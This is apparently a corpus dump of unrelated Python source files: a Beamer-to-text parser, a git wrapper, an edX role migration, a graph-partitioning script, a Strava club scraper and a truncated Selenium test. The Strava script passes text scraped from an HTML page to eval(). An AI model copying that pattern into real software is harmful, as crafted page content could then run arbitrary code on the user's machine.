from .conv2d_transpose_nchw_python import conv2d_transpose_nchw_python
from .deformable_conv2d_nchw_python import deformable_conv2d_nchw_python
from .depthwise_conv2d_python import depthwise_conv2d_python_nchw, depthwise_conv2d_python_nhwc
from .dilate_python import dilate_python
from .softmax_python import softmax_python, log_softmax_python
from .upsampling_python import upsampling_python
from .bilinear_resize_python import bilinear_resize_python
from .reorg_python import reorg_python
from .roi_align_python import roi_align_nchw_python
from .roi_pool_python import roi_pool_nchw_python
from .lrn_python import lrn_python
from .l2_normalize_python import l2_normalize_python
from .gather_nd_python import gather_nd_python
from .strided_slice_python import strided_slice_python
from .batch_matmul import batch_matmul
from .slice_axis_python import slice_axis_python
from .sequence_mask_python import sequence_mask
from .pool_grad_python import pool_grad_nchw
from .one_hot import one_hot
| apache-2.0 |
Codophile1/exide | exide/beamer_parser.py | 1 | 10947 | #!/usr/bin/python
#-*- coding: utf-8 -*-
import re, os
from datatypes.Section import Section
from datatypes.Slide import Slide
from datatypes.Presentation import Presentation
from parser_utils import get_named_entities, get_urls, get_slide_type
def parse_beamer(path):
"""
Transform a beamer tex file into a |Presentation| object
:param path: Path of the beamer file
:type path: string
:return: |Presentation|
"""
with open(path, 'r') as content_file:
content = content_file.read()
if len(re.compile(r'\\begin{frame}').split(content)) == 0:
raise Exception("Invalid LaTeX Beamer file. No frame found.")
if len(re.findall(r'\\title\[?.*\]?[\n]?\{(.*)\}', content, re.M)) > 0:
title = re.findall(r'\\title\[?.*\]?[\n]?\{(.*)\}', content, re.M)[0]
else:
title = "Untitled"
if len(re.compile(r'\\begin{frame}').split(content)) == 0:
raise Exception("Invalid LaTeX Beamer file. No frame found.")
if len(re.findall(r'\\author\[?.*\]?[\n]?\{(.*)\}', content, re.M)) > 0:
author = detex(re.findall(r'\\author\[?.*\]?[\n]?\{(.*)\}', content, re.M)[0])
else:
author = "Untitled"
pres = Presentation()
pres.title = title
pres.author = author
pres.root_section = Section(title)
title_slide = Slide()
title_slide.title = title
title_slide.type = "sectionheader"
title_slide.id = 1
pres.root_section.subelements.append(title_slide)
pres.root_section.subelements += parse_sections(content, 2)
return pres
def parse_slides(latex, starting_index=1):
"""
Extract slides from tex file.
:param latex:
:param starting_index:
:return:
"""
index = starting_index
slides = []
slides_contents = re.compile(r'\\begin{frame}').split(latex)
for i in range(1, len(slides_contents)):
if len(re.findall(r'\\titlepage', slides_contents[i])) == 0:
current_slide = Slide()
current_slide.title = get_frame_title(slides_contents[i])
current_slide.text = detex(slides_contents[i])
current_slide.id = index
current_slide.urls = get_urls(current_slide.text)
current_slide.type = get_slide_type(current_slide)
current_slide.named_entities = get_named_entities(current_slide.text.decode('ascii', "ignore"))
current_slide.emphasized_text = get_emphasized_terms(slides_contents[i])
index+=1
slides.append(current_slide)
return slides
def get_frame_title(latex):
"""
Extract the title from slide tex source.
:param latex: string
:return: String
"""
if re.match(r'^{.*}', latex):
return re.findall(r'\{(.*?)\}', latex, re.S)[0]
elif len(re.findall(r'\\frametitle{(.*?)}', latex, re.S)) > 0:
return re.findall(r'\\frametitle{(.*?)}', latex, re.S)[0]
return "Untitled"
def parse_subsections(latex, starting_index=1):
"""
Parse subsections.
:param latex:
:param starting_index:
:return: list of |Section| objects
"""
index = starting_index
subsections = []
subsections_titles = re.findall(r'\\subsection{(.*?)\}', latex, re.S)
subsections_contents = re.compile(r'\\subsection{.*}').split(latex)
subsections += parse_slides(subsections_contents[0], index)
index += len(subsections)
for i in range(1, len(subsections_contents)):
current_section = Section(subsections_titles[i-1])
current_section.subelements += parse_slides(subsections_contents[i], index)
index += len(current_section.subelements)
subsections.append(current_section)
return subsections
def parse_sections(latex, starting_index=1):
"""
Parse sections.
:param latex: string
:param starting_index: int
:return: list of |Section| objects
"""
index = starting_index
sections = []
sections_titles = re.findall(r'\\section{(.*?)\}', latex, re.S)
sections_contents = re.compile(r'\\section{.*}').split(latex)
sections += parse_subsections(sections_contents[0], index)
index += len(sections)
for i in range(1, len(sections_contents)):
current_section = Section(sections_titles[i-1])
current_section.subelements += parse_subsections(sections_contents[i], index)
index += len(current_section.subelements)
sections.append(current_section)
return sections
def get_emphasized_terms(latex):
"""
Return emphasized terms of the given latex string.
:param latex: String
:return: list of Strings
"""
return re.findall(r'\\emph{(.*?)\}', latex, re.S)
def applyRegexps(text, listRegExp):
""" Applies successively many regexps to a text"""
# apply all the rules in the ruleset
for element in listRegExp:
left = element['left']
right = element['right']
r = re.compile(left)
text = r.sub(right, text)
return text
def detex(latexText):
"""
Transform a latex text into a simple text
Credits : Gilles Bertrand http://www.gilles-bertrand.com/2012/11/a-simple-detex-function-in-python.html
"""
# initialization
regexps = []
text = latexText
# remove all the contents of the header, ie everything before the first occurence of "\begin{document}"
text = re.sub(r"(?s).*?(\\begin\{document\})", "", text, 1)
# remove comments
regexps.append({r'left': r'([^\\])%.*', 'right': r'\1'})
text = applyRegexps(text, regexps)
regexps = []
# - replace some LaTeX commands by the contents inside curly rackets
to_reduce = [r'\\emph', r'\\textbf', r'\\textit', r'\\text', r'\\IEEEauthorblockA', r'\\IEEEauthorblockN',
r'\\author', r'\\caption', r'\\author', r'\\thanks']
for tag in to_reduce:
regexps.append({'left': tag + r'\{([^\}\{]*)\}', 'right': r'\1'})
text = applyRegexps(text, regexps)
regexps = []
"""
_ _ _ _ _ _
| |__ (_) __ _| (_) __ _| |__ | |_
| '_ \| |/ _` | | |/ _` | '_ \| __|
| | | | | (_| | | | (_| | | | | |_
|_| |_|_|\__, |_|_|\__, |_| |_|\__|
|___/ |___/
"""
# - replace some LaTeX commands by the contents inside curly brackets and highlight these contents
to_highlight = [r'\\part[\*]*', r'\\chapter[\*]*', r'\\section[\*]*', r'\\subsection[\*]*', r'\\subsubsection[\*]*',
r'\\paragraph[\*]*'];
# highlightment pattern: #--content--#
for tag in to_highlight:
regexps.append({'left': tag + r'\{([^\}\{]*)\}', 'right': r'\n#--\1--#\n'})
# highlightment pattern: [content]
to_highlight = [r'\\title', r'\\author', r'\\thanks', r'\\cite', r'\\ref'];
for tag in to_highlight:
regexps.append({'left': tag + r'\{([^\}\{]*)\}', 'right': r'[\1]'})
text = applyRegexps(text, regexps)
regexps = []
"""
_ __ ___ _ __ ___ _____ _____
| '__/ _ \ '_ ` _ \ / _ \ \ / / _ \
| | | __/ | | | | | (_) \ V / __/
|_| \___|_| |_| |_|\___/ \_/ \___|
"""
# remove LaTeX tags
# - remove completely some LaTeX commands that take arguments
to_remove = [r'\\maketitle', r'\\footnote', r'\\centering', r'\\IEEEpeerreviewmaketitle', r'\\includegraphics',
r'\\IEEEauthorrefmark', r'\\label', r'\\begin', r'\\end', r'\\big', r'\\right', r'\\left',
r'\\documentclass', r'\\usepackage', r'\\bibliographystyle', r'\\bibliography', r'\\cline',
r'\\multicolumn', r'\\pause']
# replace tag with options and argument by a single space
for tag in to_remove:
regexps.append({'left': tag + r'(\[[^\]]*\])*(\{[^\}\{]*\})*', 'right': r' '})
# regexps.append({'left':tag+r'\{[^\}\{]*\}\[[^\]\[]*\]', 'right':r' '})
text = applyRegexps(text, regexps)
regexps = []
"""
_
_ __ ___ _ __ | | __ _ ___ ___
| '__/ _ \ '_ \| |/ _` |/ __/ _ \
| | | __/ |_) | | (_| | (_| __/
|_| \___| .__/|_|\__,_|\___\___|
|_|
"""
# - replace some LaTeX commands by the contents inside curly rackets
# replace some symbols by their ascii equivalent
# - common symbols
regexps.append({'left': r'\\eg(\{\})* *', 'right': r'e.g., '})
regexps.append({'left': r'\\ldots', 'right': r'...'})
regexps.append({'left': r'\\Rightarrow', 'right': r'=>'})
regexps.append({'left': r'\\rightarrow', 'right': r'->'})
regexps.append({'left': r'\\le', 'right': r'<='})
regexps.append({'left': r'\\ge', 'right': r'>'})
regexps.append({'left': r'\\_', 'right': r'_'})
regexps.append({'left': r'\\\\', 'right': r'\n'})
regexps.append({'left': r'~', 'right': r' '})
regexps.append({'left': r'\\&', 'right': r'&'})
regexps.append({'left': r'\\%', 'right': r'%'})
regexps.append({'left': r'([^\\])&', 'right': r'\1\t'})
regexps.append({'left': r'\\item', 'right': r'\t- '})
regexps.append({'left': r'\\\hline[ \t]*\\hline', 'right': r'============================================='})
regexps.append({'left': r'[ \t]*\\hline', 'right': r'_____________________________________________'})
# - special letters
regexps.append({'left': r'\\\'{?\{e\}}?', 'right': r'é'})
regexps.append({'left': r'\\`{?\{a\}}?', 'right': r'à'})
regexps.append({'left': r'\\\'{?\{o\}}?', 'right': r'ó'})
regexps.append({'left': r'\\\'{?\{a\}}?', 'right': r'á'})
# keep untouched the contents of the equations
regexps.append({'left': r'\$(.)\$', 'right': r'\1'})
regexps.append({'left': r'\$([^\$]*)\$', 'right': r'\1'})
# remove the equation symbols ($)
regexps.append({'left': r'([^\\])\$', 'right': r'\1'})
# correct spacing problems
regexps.append({'left': r' +,', 'right': r','})
regexps.append({'left': r' +', 'right': r' '})
regexps.append({'left': r' +\)', 'right': r'\)'})
regexps.append({'left': r'\( +', 'right': r'\('})
regexps.append({'left': r' +\.', 'right': r'\.'})
# remove lonely curly brackets
regexps.append({'left': r'^([^\{]*)\}', 'right': r'\1'})
regexps.append({'left': r'([^\\])\{([^\}]*)\}', 'right': r'\1\2'})
regexps.append({'left': r'\\\{', 'right': r'\{'})
regexps.append({'left': r'\\\}', 'right': r'\}'})
# strip white space characters at end of line
regexps.append({'left': r'[ \t]*\n', 'right': r'\n'})
# remove consecutive blank lines
regexps.append({'left': r'([ \t]*\n){3,}', 'right': r'\n'})
# apply all those regexps
text = applyRegexps(text, regexps)
regexps = []
# return the modified text
return text
if __name__ == '__main__':
__location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))+"/tests/data/beamer"
pres = parse_beamer(os.path.join(__location__, "simple_beamer"))
print pres.title
print pres.author
print pres.root_section.outline
| lgpl-3.0 |
mwilliamson/mayo | mayo/git.py | 1 | 1623 | from .util import run
class Git(object):
name = "git"
directory_name = ".git"
default_branch = "origin/master"
def clone(self, repository_uri, local_path):
_git(["clone", repository_uri, local_path])
return GitRepository(local_path)
def local_repo(self, working_directory):
return GitRepository(working_directory)
class GitRepository(object):
type = Git.name
def __init__(self, working_directory):
self.working_directory = working_directory
def update(self):
self._git(["fetch"])
def checkout_revision(self, revision):
if self._git(["branch", "-r", "--contains", "origin/" + revision], allow_error=True).return_code == 0:
revision = "origin/" + revision
self._git(["checkout", revision])
def remote_repo_uri(self):
return self._git(["config", "remote.origin.url"]).output.strip()
def head_revision(self):
return self._git(["rev-parse", "HEAD"]).output.strip()
def find_ignored_files(self):
result = self._git(["status", "-z", "--ignored"], decode=False)
lines = result.output.split(b"\0")
ignore_prefix = b"!! "
return [
line[len(ignore_prefix):].decode("utf8")
for line in lines
if line.startswith(ignore_prefix)
]
def _git(self, git_command, **kwargs):
return _git(git_command, cwd=self.working_directory, **kwargs)
def _git(git_command, *args, **kwargs):
command = ["git"] + git_command
return run(command, *args, **kwargs)
| bsd-2-clause |
eestay/edx-platform | common/djangoapps/student/migrations/0036_access_roles_orgless.py | 125 | 17964 | # -*- coding: utf-8 -*-
from south.v2 import DataMigration
from xmodule.modulestore.django import modulestore
import re
from opaque_keys.edx.locations import SlashSeparatedCourseKey
import logging
from django.db.models.query_utils import Q
from django.db.utils import IntegrityError
from xmodule.modulestore import ModuleStoreEnum
import bson.son
from xmodule.modulestore.mixed import MixedModuleStore
import itertools
log = logging.getLogger(__name__)
class Migration(DataMigration):
"""
Converts course_creator, instructor_, staff_, and betatestuser_ to new table
"""
GROUP_ENTRY_RE = re.compile(r'(?P<role_id>staff|instructor|beta_testers)_(?P<course_id_string>\S*)')
def forwards(self, orm):
"""
Converts group table entries for write access and beta_test roles to course access roles table.
"""
store = modulestore()
if isinstance(store, MixedModuleStore):
self.mongostore = modulestore()._get_modulestore_by_type(ModuleStoreEnum.Type.mongo)
self.xmlstore = modulestore()._get_modulestore_by_type(ModuleStoreEnum.Type.xml)
elif store.get_modulestore_type() == ModuleStoreEnum.Type.mongo:
self.mongostore = store
self.xmlstore = None
elif store.get_modulestore_type() == ModuleStoreEnum.Type.xml:
self.mongostore = None
self.xmlstore = store
else:
return
query = Q(name__startswith='staff') | Q(name__startswith='instructor') | Q(name__startswith='beta_testers')
for group in orm['auth.Group'].objects.filter(query).exclude(name__contains="/").all():
def _migrate_users(correct_course_key, role):
"""
Get all the users from the old group and migrate to this course key in the new table
"""
log.info(
u'Giving %s users access to %s',
group.name, correct_course_key
)
for user in orm['auth.user'].objects.filter(groups=group).all():
entry = orm['student.courseaccessrole'](
role=role,
user=user,
org=correct_course_key.org,
course_id=correct_course_key,
)
try:
entry.save()
except IntegrityError:
pass
parsed_entry = self.GROUP_ENTRY_RE.search(group.name)
if parsed_entry is None:
log.warn('Ignoring an unexpected unparsable entry %s', group.name)
continue
role = parsed_entry.group('role_id')
course_id_string = parsed_entry.group('course_id_string')
# if it's a full course_id w/ dots, ignore it
if u'/' not in course_id_string and not self.dotted_course(course_id_string):
# check new table to see if it's been added as org permission
if not orm['student.courseaccessrole'].objects.filter(
role=role,
org__iexact=course_id_string,
).exists():
# old auth was of form role_coursenum. Grant access to all such courses wildcarding org and run
# look in xml for matching courses
if self.xmlstore is not None:
for course in self.xmlstore.get_courses():
if course_id_string == course.id.course.lower():
_migrate_users(course.id, role)
if self.mongostore is not None:
mongo_query = re.compile(ur'^{}$'.format(course_id_string), re.IGNORECASE)
for mongo_entry in self.mongostore.collection.find(
{"_id.category": "course", "_id.course": mongo_query}, fields=["_id"]
):
mongo_id_dict = mongo_entry['_id']
course_key = SlashSeparatedCourseKey(
mongo_id_dict['org'], mongo_id_dict['course'], mongo_id_dict['name']
)
_migrate_users(course_key, role)
def dotted_course(self, parts):
"""
Look for all possible org/course/run patterns from a possibly dotted source
"""
for org_stop, course_stop in itertools.combinations(range(1, len(parts)), 2):
org = '.'.join(parts[:org_stop])
course = '.'.join(parts[org_stop:course_stop])
run = '.'.join(parts[course_stop:])
course_key = SlashSeparatedCourseKey(org, course, run)
correct_course_key = self._map_downcased_ssck(course_key)
if correct_course_key is not None:
return correct_course_key
return False
def _map_downcased_ssck(self, downcased_ssck):
"""
Get the normal cased version of this downcased slash sep course key
"""
if self.mongostore is not None:
course_son = bson.son.SON([
('_id.tag', 'i4x'),
('_id.org', re.compile(ur'^{}$'.format(downcased_ssck.org), re.IGNORECASE | re.UNICODE)),
('_id.course', re.compile(ur'^{}$'.format(downcased_ssck.course), re.IGNORECASE | re.UNICODE)),
('_id.category', 'course'),
('_id.name', re.compile(ur'^{}$'.format(downcased_ssck.run), re.IGNORECASE | re.UNICODE)),
])
entry = self.mongostore.collection.find_one(course_son)
if entry:
idpart = entry['_id']
return SlashSeparatedCourseKey(idpart['org'], idpart['course'], idpart['name'])
if self.xmlstore is not None:
for course in self.xmlstore.get_courses():
if (
course.id.org.lower() == downcased_ssck.org and course.id.course.lower() == downcased_ssck.course
and course.id.run.lower() == downcased_ssck.run
):
return course.id
return None
def backwards(self, orm):
"No obvious way to reverse just this migration, but reversing 0035 will reverse this."
pass
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'student.anonymoususerid': {
'Meta': {'object_name': 'AnonymousUserId'},
'anonymous_user_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.courseaccessrole': {
'Meta': {'unique_together': "(('user', 'org', 'course_id', 'role'),)", 'object_name': 'CourseAccessRole'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'org': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '64', 'blank': 'True'}),
'role': ('django.db.models.fields.CharField', [], {'max_length': '64', 'db_index': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.courseenrollment': {
'Meta': {'ordering': "('user', 'course_id')", 'unique_together': "(('user', 'course_id'),)", 'object_name': 'CourseEnrollment'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'mode': ('django.db.models.fields.CharField', [], {'default': "'honor'", 'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.courseenrollmentallowed': {
'Meta': {'unique_together': "(('email', 'course_id'),)", 'object_name': 'CourseEnrollmentAllowed'},
'auto_enroll': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'student.loginfailures': {
'Meta': {'object_name': 'LoginFailures'},
'failure_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lockout_until': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.passwordhistory': {
'Meta': {'object_name': 'PasswordHistory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'time_set': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.pendingemailchange': {
'Meta': {'object_name': 'PendingEmailChange'},
'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_email': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'student.pendingnamechange': {
'Meta': {'object_name': 'PendingNameChange'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'rationale': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'student.registration': {
'Meta': {'object_name': 'Registration', 'db_table': "'auth_registration'"},
'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'student.userprofile': {
'Meta': {'object_name': 'UserProfile', 'db_table': "'auth_userprofile'"},
'allow_certificate': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'city': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'country': ('django_countries.fields.CountryField', [], {'max_length': '2', 'null': 'True', 'blank': 'True'}),
'courseware': ('django.db.models.fields.CharField', [], {'default': "'course.xml'", 'max_length': '255', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '6', 'null': 'True', 'blank': 'True'}),
'goals': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'level_of_education': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '6', 'null': 'True', 'blank': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'mailing_address': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'meta': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': "orm['auth.User']"}),
'year_of_birth': ('django.db.models.fields.IntegerField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'})
},
'student.userstanding': {
'Meta': {'object_name': 'UserStanding'},
'account_status': ('django.db.models.fields.CharField', [], {'max_length': '31', 'blank': 'True'}),
'changed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'standing_last_changed_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'standing'", 'unique': 'True', 'to': "orm['auth.User']"})
},
'student.usertestgroup': {
'Meta': {'object_name': 'UserTestGroup'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'db_index': 'True', 'symmetrical': 'False'})
}
}
complete_apps = ['student']
symmetrical = True
| agpl-3.0 |
Determinant/weaver | tests/static_partitioning/stream_partition.py | 3 | 3924 | #! /usr/bin/env python
import sys
import random
import math
from sets import Set
# adds node attribute of which shard node should be placed on
num_shards = 8
num_runs = 1
capacity = 84000/num_shards
assignments = dict()
shard_sizes = [0] * num_shards
LDG = True
G = {}
def load(argv):
assert(len(argv) == 2)
print 'loading graph from file'
inputfile = open(argv[1], 'r')
for line in inputfile:
if line[0] == '#': # ignore comments
continue
edge = line.split()
assert(len(edge) == 2)
n0 = int(edge[0])
n1 = int(edge[1])
if n0 not in G:
G[n0] = Set([])
if n1 not in G:
G[n1] = Set([])
G[n0].add(n1)
inputfile.close()
def get_balanced_assignment(tied_shards):
min_size = shard_sizes[tied_shards[0]] #pick one as min
min_indices = []
for s in tied_shards:
if shard_sizes[s] < min_size:
min_size = shard_sizes[s]
min_indices = [s]
elif shard_sizes[s] == min_size:
min_indices.append(s)
assert(len(min_indices) > 0)
return random.choice(min_indices)
def penalty(shard):
return 1.0 - (float(shard_sizes[shard])/float(capacity))
def get_intersection_scores(node):
shard_scores = [0] * num_shards
for nbr in G[node]:
if nbr in assignments:
shard_scores[assignments[nbr]] += 1
return shard_scores
def clustering_multiplier(num_mutual_friends):
return math.log(2 + num_mutual_friends)
def calc_mutual_friends(n1, n2):
return len(G[n1] & G[n2])
def get_clustering_scores(node):
shard_scores = [0] * num_shards
for nbr in G[node]:
if nbr in assignments:
mutual_friends = calc_mutual_friends(node, nbr)
shard_scores[assignments[nbr]] += clustering_multiplier(mutual_friends)
return shard_scores
def get_ldg_assignment(node):
if LDG:
shard_scores = get_intersection_scores(node)
else:
shard_scores = get_clustering_scores(node)
arg_max = 0.0
max_indices = []
for i in range(num_shards):
val = (float(shard_scores[i])*penalty(i))
if arg_max < val:
arg_max = val
max_indices = [i]
elif arg_max == val:
max_indices.append(i)
assert(len(max_indices) > 0)
if len(max_indices) is 1:
return max_indices[0]
else:
return get_balanced_assignment(max_indices)
def get_hash_assignment(node):
return node % num_shards
print 'partitioning graph onto ' + str(num_shards) + ' shards using LDG with a capacity constant of ' + str(capacity)
load(sys.argv)
for run in range(num_runs):
moved = 0
for n in G:
orig_loc = -1
if n in assignments:
shard_sizes[assignments[n]] -= 1
orig_loc = assignments[n]
put_on_shard = get_ldg_assignment(n)
#put_on_shard = get_hash_assignment(n)
assignments[n] = put_on_shard
shard_sizes[put_on_shard] += 1
if orig_loc != -1 and orig_loc != put_on_shard:
moved += 1
print 'Completed run ' + str(run) + ', moved node count = ' + str(moved)
print shard_sizes
'''
colors = [float(assignments[n])/float(num_shards) for n in G.nodes()]
print 'trying to draw graph...'
nx.draw_circular(G, node_color=colors)
plt.show()
'''
fname = sys.argv[1].rsplit('.',1)
if len(fname) == 1:
fileout = open(fname[0] + '-partitioned.', 'w')
else:
fileout = open(fname[0] + '-partitioned.' + fname[1], 'w')
fileout.write('#' + str(len(assignments)) + '\n')
for (k,v) in assignments.iteritems():
fileout.write(str(k) + ' ' + str(v) + '\n')
for n in G:
for nbr in G[n]:
line = str(n) + ' ' + str(nbr)
if random.random() > 0.9:
line += ' color blue\n'
else:
line += '\n'
fileout.write(line)
fileout.close()
print 'finshed writing assignments'
| bsd-3-clause |
wek32/strava-club-ytd | extract_group_members.py | 1 | 1936 | '''
Strava club information is not publicly available. To get the club information
the club owner needs to be logged in. This script takes the HTML file of the
strava club page and extracts all the users/athletes.
'''
from bs4 import BeautifulSoup
import argparse
def get_group_members_from_html(html_in):
with open(html_in, 'rb') as fin:
soup = BeautifulSoup(fin)
scripts = soup.find_all('script')
for jscript in scripts:
text = jscript.get_text()
if 'members:' in text:
junk, tail = text.split('members:')
last_char = tail.find(']]')
first_char = tail.find('[[')
member_list = tail[first_char:last_char+2]
mem_array_raw = eval(member_list)
mem_array = []
for member in mem_array_raw:
mem_array.append([member[0], member[1].decode('unicode_escape').encode('utf8')])
return mem_array
return []
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Get the year to date totals for a list of users in strava.')
parser.add_argument('--html', dest='html_file', required=True,
help='A saved copy of the group strava page when logged in.')
parser.add_argument('-o', '--out', dest='out_file',
default='club_members.csv',
help='Output CSV file name, default value is club_members.csv')
args = parser.parse_args()
html_file = args.html_file
out_file = args.out_file
with open (out_file, 'wb') as fout:
members = get_group_members_from_html(html_file)
for member in members:
line = str(member[0]) + ',' + member[1] + '\n'
fout.write(line)
with open (out_file, 'r') as f:
for line in f:
print line.strip()
| mit |
vinay-qa/vinayit-android-server-apk | py/test/selenium/webdriver/common/window_tests.py | 7 | 1770 | # Copyright 2008-2009 WebDriver committers
# Copyright 2008-2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http:#www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import pytest
from selenium.webdriver.support.wait import WebDriverWait
class WindowTests(unittest.TestCase):
@pytest.mark.ignore_chrome
@pytest.mark.ignore_opera
@pytest.mark.ignore_ie
def testShouldMaximizeTheWindow(self):
resize_timeout = 5
wait = WebDriverWait(self.driver, resize_timeout)
old_size = self.driver.get_window_size()
self.driver.set_window_size(200, 200)
